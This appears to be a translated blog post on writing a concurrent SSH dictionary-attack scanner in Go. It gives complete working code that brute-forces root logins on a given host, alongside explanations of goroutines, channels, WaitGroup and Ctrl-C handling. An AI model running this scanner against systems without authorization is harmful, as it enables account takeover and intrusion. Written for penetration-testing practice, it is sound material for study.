SSH weak password scan (Golang version)


0x00

During penetration tests I try to write a little code of my own instead of always reaching for other people's tools. So when the idea of an SSH weak-password scanner came to mind, I got started right away.


0x01

For a scanner, running single-threaded is an insult to your machine. I ruled out the two languages in which multithreading is painful to write and went straight to Python. The start was smooth, but once the scan was actually running I hit a serious problem: why does Ctrl-C do nothing? After a lot of searching, the short version is that Python runs signal handlers only in the main thread, and my main thread was blocked waiting on the worker threads, so the SIGINT was never handled and the workers just kept running.

There are ways around it, but the behaviour struck me as silly and hostile to the user. So I turned to a C-family language with concurrency built in: Go.


0x10

I have to say that, not being very familiar with Go, I ran into quite a bit of trouble getting these few dozen lines written.

The first was using the ssh package. For some reason the examples in its godoc show the identifiers without the package qualifier, and I copied them that way without thinking. The compiler then complained that the ssh import was unused while Dial and the other identifiers were undefined. That one only cost a moment.

The second mistake was uglier. In Python, worker threads keep running after the main thread finishes; in Go it is the opposite: when main returns the whole program exits and any running goroutines die with it. I hadn't thought about that, and my first fix was dumb: a bare infinite for loop in main to stop it from returning. That does not work. It busy-spins, and with the single-OS-thread default of the time a loop that never calls anything can starve the very goroutines it is waiting for, so the scan never ends.

Third, not a mistake. In Python I serialised access to the password list with a lock; Go does this elegantly with a channel, which handles both communication and blocking between goroutines, so a few lines of code do the job.

Fourth, the "scan finished" message printed after all the goroutines have run gave me trouble. At first I printed it when readPassword returned, but at that point some goroutines are still working, so they print extra lines after it, which looks terrible. Then I found the synchronisation primitives in the sync package (WaitGroup) and that solved it.

package main

// The post imported "code.google.com/p/go.crypto/ssh"; that repository has
// since moved to golang.org/x/crypto/ssh, which is the path that builds today.
import (
	"bufio"
	"fmt"
	"os"
	"strings"
	"sync"
	"time"

	"golang.org/x/crypto/ssh"
)

var channal = make(chan string) // candidate passwords, reader -> workers
var w sync.WaitGroup           // lets main wait until every worker has exited
var mu sync.Mutex
var found string // set by the worker whose login succeeded

// readPassword feeds the dictionary to the workers one line at a time and
// closes the channel at EOF; the closed channel is what makes workers return.
func readPassword(pf *bufio.Reader) {
	for {
		password, err := pf.ReadString('\n')
		if err != nil {
			close(channal)
			return
		}
		password = strings.TrimRight(password, "\r\n")
		channal <- password
	}
}

// ssh_login is one worker. w.Done() is deferred so it also runs on the
// success path; returning without it would leave w.Wait() blocked forever.
func ssh_login(hostname string, username string) {
	defer w.Done()
	for {
		password, more := <-channal
		if !more {
			return
		}
		config := &ssh.ClientConfig{
			User: username,
			Auth: []ssh.AuthMethod{
				ssh.Password(password),
			},
			// Current x/crypto/ssh refuses to dial without a host key policy.
			// Not pinning the key is acceptable for a scanner, not for a real client.
			HostKeyCallback: ssh.InsecureIgnoreHostKey(),
			Timeout:         10 * time.Second, // a hung target must not stall the worker
		}
		client, err := ssh.Dial("tcp", hostname, config)
		if err != nil {
			// A refused or timed-out connection lands here too, not only a wrong password.
			fmt.Printf("\033[33m[-]testing password %s\tresult:wrong\n\033[0m", password)
			continue
		}
		client.Close()
		fmt.Printf("\033[32m[+]found password %s for %s\n\033[0m", password, username)
		mu.Lock()
		found = password
		mu.Unlock()
		return
	}
}

func main() {
	if len(os.Args) < 2 {
		fmt.Printf("[-]usage %s [hostname:port]\n", os.Args[0])
		os.Exit(1)
	}
	hostname := os.Args[1]
	pf, err := os.Open("password.lst")
	if err != nil {
		fmt.Println("[-]dictionary needed")
		os.Exit(1)
	}
	defer pf.Close()
	bf := bufio.NewReader(pf)
	go readPassword(bf)
	fmt.Println("Scanning start!")
	// 20 concurrent login attempts. A default OpenSSH sshd (MaxStartups 10:30:100)
	// starts dropping unauthenticated connections beyond 10 at a time, so with
	// this many workers real candidates can show up as "wrong"; lower it if you
	// see a wall of failures.
	for i := 0; i < 20; i++ {
		w.Add(1)
		go ssh_login(hostname, "root")
	}
	w.Wait()
	if found == "" {
		fmt.Println("Scan finished, result not found")
	} else {
		fmt.Printf("Scan finished, password for root: %s\n", found)
	}
}
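The four points above (goroutines dying when main returns, a channel as the work queue, a WaitGroup for the "finished" line) and the Ctrl-C problem that drove the switch from Python are all the same problem: coordinating a pool of workers. Below is an added example, not code from the original post, of that worker pool with the two things the post's version does not do: it stops as soon as a password is found or the user presses Ctrl-C (os/signal plus context), and the "finished" line can only print after every worker has exited. The `Attempt` type, `bruteForce`, the `Result` counters and the simulated target in `main` are all my own constructions; the real ssh.Dial call is only described in a comment so the example runs offline with the standard library alone.

```go
package main

import (
	"context"
	"fmt"
	"os"
	"os/signal"
	"sync"
)

// Attempt tries one candidate: ok=true is a successful login, (false, nil) a
// wrong password, and err anything else (refused, timeout, sshd MaxStartups
// throttling). The real scanner would wrap ssh.Dial here; injecting it lets
// the pool run offline. (Hypothetical type, not from the post.)
type Attempt func(ctx context.Context, password string) (ok bool, err error)

// Result summarises a scan. Many Errors relative to Tried means the target is
// throttling or unreachable, not that the dictionary is bad.
type Result struct {
	Password string
	Found    bool
	Tried    int
	Errors   int
}

// bruteForce hands candidates to `workers` goroutines over an unbuffered
// channel (the same reader/worker shape as the post's code) and adds two
// things: it stops early once a worker succeeds or ctx is cancelled (Ctrl-C),
// and it returns only after every worker has exited.
func bruteForce(ctx context.Context, candidates []string, workers int, try Attempt) Result {
	ctx, cancel := context.WithCancel(ctx)
	defer cancel()
	jobs := make(chan string)
	var wg sync.WaitGroup
	var mu sync.Mutex
	var res Result

	// Producer: selecting on ctx.Done() means it never blocks forever on a
	// channel whose readers have all gone away.
	go func() {
		defer close(jobs) // closing the channel is what ends the workers' loops
		for _, p := range candidates {
			select {
			case jobs <- p:
			case <-ctx.Done():
				return
			}
		}
	}()

	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done() // deferred, so the success path cannot forget it
			for p := range jobs {
				if ctx.Err() != nil {
					return // another worker found it, or the user hit Ctrl-C
				}
				ok, err := try(ctx, p)
				mu.Lock()
				res.Tried++
				if err != nil {
					res.Errors++
				} else if ok && !res.Found {
					res.Found, res.Password = true, p
				}
				hit := res.Found
				mu.Unlock()
				if hit {
					cancel() // stop the producer and the other workers
					return
				}
			}
		}()
	}
	wg.Wait()
	return res
}

func main() {
	// Ctrl-C cancels ctx, so the pool winds down instead of dying mid-print.
	ctx, stop := signal.NotifyContext(context.Background(), os.Interrupt)
	defer stop()

	// Constructed sample wordlist; a real run reads password.lst instead.
	wordlist := []string{"123456", "password", "admin", "root", "toor", "qwerty", "letmein"}

	// Simulated target for the demo: only "toor" logs in. Against a real host
	// this would call ssh.Dial with ssh.Password(p) in ClientConfig.Auth and
	// return (true, nil) when the handshake completes.
	fake := func(_ context.Context, p string) (bool, error) { return p == "toor", nil }

	res := bruteForce(ctx, wordlist, 4, fake)
	switch {
	case res.Found:
		fmt.Printf("[+] found password %q for root after %d attempts\n", res.Password, res.Tried)
	case ctx.Err() != nil:
		fmt.Printf("[-] interrupted after %d attempts\n", res.Tried)
	default:
		fmt.Printf("[-] scan finished, result not found (%d attempts, %d errors)\n", res.Tried, res.Errors)
	}
}
```

Two design points worth noting. The worker checks ctx.Err() before each attempt rather than only in the producer, because a candidate may already have been handed over when the cancel arrives. And the found worker calls cancel() instead of just returning: returning alone would leave the other workers grinding through the rest of the dictionary against a host you have already logged into, which is both slow and noisy in the target's auth log.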



I am not very familiar with Go, so there is certainly plenty of code here that could be optimised. But the basic ability to scan for weak passwords is there.


PS1. You need a weak-password dictionary; I used the password.lst wordlist that ships with John the Ripper.

PS2. The ssh package is not in the standard library; install it with go get followed by the package path. The code.google.com/p/go.crypto/ssh path used when this was written has since moved to golang.org/x/crypto/ssh.

PS3. The "\033[33m" sequences in the strings are terminal colour escapes: failed attempts print in yellow (33) and the correct password in green (32); "\033[0m" resets the colour.
